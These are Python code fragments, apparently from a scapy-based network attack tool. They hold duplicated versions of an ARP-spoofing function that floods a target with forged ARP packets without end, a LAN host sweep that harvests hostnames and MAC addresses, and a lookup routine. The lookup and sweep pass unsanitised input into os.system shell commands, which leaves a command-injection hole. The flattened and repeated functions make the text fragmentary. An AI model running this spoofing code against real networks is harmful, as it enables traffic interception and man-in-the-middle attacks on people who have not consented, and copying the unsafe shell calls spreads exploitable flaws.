def arpspoof(target, hti, terminal): try: terminal.write('\n[+] Sending spoofed ARP packets to ' + target) packet = Ether(dst=get_mac(target)) / ARP( op='who-has', psrc=hti, pdst=target, hwdst=get_mac(target)) # packet2 = Ether()/ARP(op=2,psrc=target,pdst=hti,hwdst=get_mac(hti)) while True: sendp(packet, verbose=0) #sendp(packet2,verbose=0) sleep(2) except Exception as s: terminal.write('\n' + str(s)) traceback.print_exc()
def arpspoof(target, hti, terminal=None): if terminal == None: print("[+] Sending spoofed ARP packets to " + target) else: terminal['text'] += '\n[+] Sending spoofed ARP packets to ' + target packet = Ether(dst=get_mac(target)) / ARP( op='who-has', psrc=hti, pdst=target, hwdst=get_mac(target)) packet2 = Ether() / ARP(op=2, psrc=target, pdst=hti, hwdst=get_mac(hti)) while True: sendp(packet, verbose=0) #sendp(packet2,verbose=0) sleep(2)
def __getips(step, start, quiet, ipr, terminal): for i in range(start, 255, step): ip = ipr % i exitstat = os.system('fping -q -t 50 ' + ip) if not exitstat: tmp = [] try: name, alias, addr = socket.gethostbyaddr(ip) tmp.append(name) except: tmp.append('unknown') finally: tmp.append(get_mac(ip)) tmp.append(ip) active_ips.append(tuple(tmp)) if terminal == None: print("-" * 30 + "\n") print("[+] " + ip + " Is Active ") print("\n" + "-" * 30) else: terminal.configure(text=terminal.cget("text") + "\n\n[+] " + ip + " Is Active \n") elif exitstat and quiet: if terminal == None: print("[-] " + ip + " is inavtive ") else: terminal.configure(text=terminal.cget("text") + '\n[-] ' + ip + ' is inactive ')
def lookup(host, terminal): try: exitstat = os.system('fping ' + host) if not exitstat: try: name, alias, addr = socket.gethostbyaddr(host.strip()) if not alias: alias = 'unknown' terminal.write("\nHostname // " + name + " | Aliases // " + str(alias) + " | Address // " + addr[0] + " | HWAddress // " + get_mac(host)) except: terminal.write('\n[*] Could not find a hostname') try: terminal.write("\n Address // " + host + " | HWAddress // " + get_mac(host)) except TypeError: terminal.write( '\n[-] Could not find a mac address\nAddress // ' + host) else: terminal.write('\n[-] Error: Host not found') except Exception as s: terminal.write('\n' + str(traceback.print_exc()))
def __getips(step, start, quiet, ipr, terminal): try: for i in range(start, 255, step): ip = ipr % i exitstat = os.system('fping -q -t 50 ' + ip) if not exitstat: tmp = [] try: name, alias, addr = socket.gethostbyaddr(ip) tmp.append(name) except: tmp.append('unknown') finally: tmp.append(get_mac(ip)) tmp.append(ip) active_ips.append(tuple(tmp)) terminal.write("\n\n[+] " + ip + " Is Active \n") elif exitstat and quiet: terminal.write('\n[-] ' + ip + ' is inactive ') except Exception as s: terminal.write('\n' + str(s)) traceback.print_exc()